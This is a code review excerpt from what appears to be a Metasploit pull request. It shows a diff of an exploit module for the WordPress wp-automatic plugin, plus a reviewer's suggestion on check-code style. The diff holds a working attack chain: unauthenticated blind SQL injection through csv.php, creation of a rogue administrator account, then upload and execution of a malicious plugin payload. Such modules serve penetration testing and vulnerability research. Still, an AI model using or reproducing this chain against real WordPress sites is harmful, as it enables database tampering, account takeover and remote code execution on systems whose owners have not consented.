modules/exploits/multi/http/wp_automatic_sqli_to_rce.rb

```diff
@@ -0,0 +1,163 @@
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username to create', Faker::Internet.username]),
+        OptString.new('PASSWORD', [false, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
+        OptString.new('EMAIL', [false, 'Email for the new user', Faker::Internet.email])
+      ]
+    )
+  end
+
+  def create_sqli_instance
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      execute_sql_query(payload)
+    end
+  end
+
+  def execute_sql_query(query)
+    formatted_query = query.strip.upcase.start_with?('INSERT') ? query : "SELECT (#{query})"
+    response = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-automatic', 'inc', 'csv.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'q' => formatted_query,
+        'auth' => "\0",
+        'integ' => Rex::Text.md5(formatted_query)
+      }
+    })
+
+    unless response
+      fail_with(Failure::UnexpectedReply, "Failed to execute SQL query: #{query}")
+    end
+  end
+
+  def upload_and_execute_payload(admin_cookie)
+    plugin_name = Faker::App.name.gsub(/\s+/, '').downcase
+    payload_name = Faker::Hacker.noun.gsub(/\s+/, '').downcase
+
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status('Uploading payload...')
+
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("Executing the payload at #{payload_uri}...")
+
+    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
+    register_dir_for_cleanup("../#{plugin_name}")
+    send_request_cgi({
+      'uri' => payload_uri,
+      'method' => 'GET'
+    }, 1)
+  end
+
+  def exploit
+    create_sqli_instance
+    wordpress_sqli_initialize(@sqli)
+
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    email = datastore['EMAIL']
+
+    wordpress_sqli_create_user(username, password, email)
+    wordpress_sqli_grant_admin_privileges(username)
+    admin_cookie = wordpress_login(username, password)
+
+    fail_with(Failure::UnexpectedReply, 'Failed to log in to WordPress admin.') unless admin_cookie
+
+    upload_and_execute_payload(admin_cookie)
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    print_status('Attempting SQLi test to verify vulnerability...')
+
+    create_sqli_instance
+
+    check_result = @sqli.test_vulnerable ? CheckCode::Appears : CheckCode::Safe
+    message = check_result == CheckCode::Appears ? 'Target is vulnerable to SQLi!' : 'Target is not vulnerable or the SQLi test failed.'
+    (check_result == CheckCode::Appears ? print_good(message) : print_status(message))
```

Comment:
I think you can pass the message as part of the check code.

```suggestion
    if @sqli.test_vulnerable
      check_result = CheckCode::Vulnerable('Target is vulnerable to SQLi!')
    else
      check_result = CheckCode::Safe('Target is not vulnerable or the SQLi test failed.')
    end
```